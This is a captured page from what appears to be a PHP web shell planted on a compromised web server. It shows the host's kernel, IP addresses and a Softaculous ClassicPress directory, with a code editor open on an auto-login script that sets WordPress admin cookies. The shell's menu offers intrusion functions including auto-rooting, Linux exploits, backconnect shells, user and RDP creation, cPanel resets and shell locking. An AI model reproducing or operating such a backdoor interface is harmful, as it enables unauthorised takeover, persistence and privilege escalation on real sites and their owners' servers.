Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.145.80.247
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
classicpress /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
482
B
-rw-r--r--
_htaccess
333
B
-rw-r--r--
_index.php
59
B
-rw-r--r--
_wp-config.php
3.44
KB
-rw-r--r--
check_charset.php
1.82
KB
-rw-r--r--
clone.php
15.71
KB
-rw-r--r--
edit.php
5.16
KB
-rw-r--r--
edit.xml
628
B
-rw-r--r--
extend.php
3.94
KB
-rw-r--r--
fileindex.php
305
B
-rw-r--r--
import.php
5.69
KB
-rw-r--r--
info.xml
2.89
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
19.67
KB
-rw-r--r--
install.xml
1.23
KB
-rw-r--r--
md5
2.46
KB
-rw-r--r--
notes.txt
1.76
KB
-rw-r--r--
sign_on.php
1010
B
-rw-r--r--
soft.htaccess
127
B
-rw-r--r--
wp-config.php
3.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sign_on.php
<?php @unlink(__FILE__); // Validate if the request is from Softaculous if($_REQUEST['pass'] != '[[autopass]]'){ die("Unauthorized Access"); } // Dummy plugin dir so that no plugins are loaded as they conflict with our login process define('WP_PLUGIN_DIR', '[[softpath]]/[[autopass]]'); require('wp-blog-header.php'); require('wp-includes/pluggable.php'); $signon_user = '[[signon_username]]'; //Backword compatibility ($__setting['signon_username'] won't be there in previous versions <= 5.2.3) if(!empty($signon_user) && !preg_match('/^\[\[(.*?)\]\]$/is', $signon_user)){ $user = get_user_by('login', $signon_user); }else{ $user_info = get_userdata(1); // Automatic login // $username = $user_info->user_login; $user = get_user_by('login', $username); } // Redirect URL // if ( !is_wp_error( $user ) ) { wp_clear_auth_cookie(); wp_set_current_user ( $user->ID ); wp_set_auth_cookie ( $user->ID ); $redirect_to = admin_url(); wp_safe_redirect( $redirect_to ); exit(); }
Close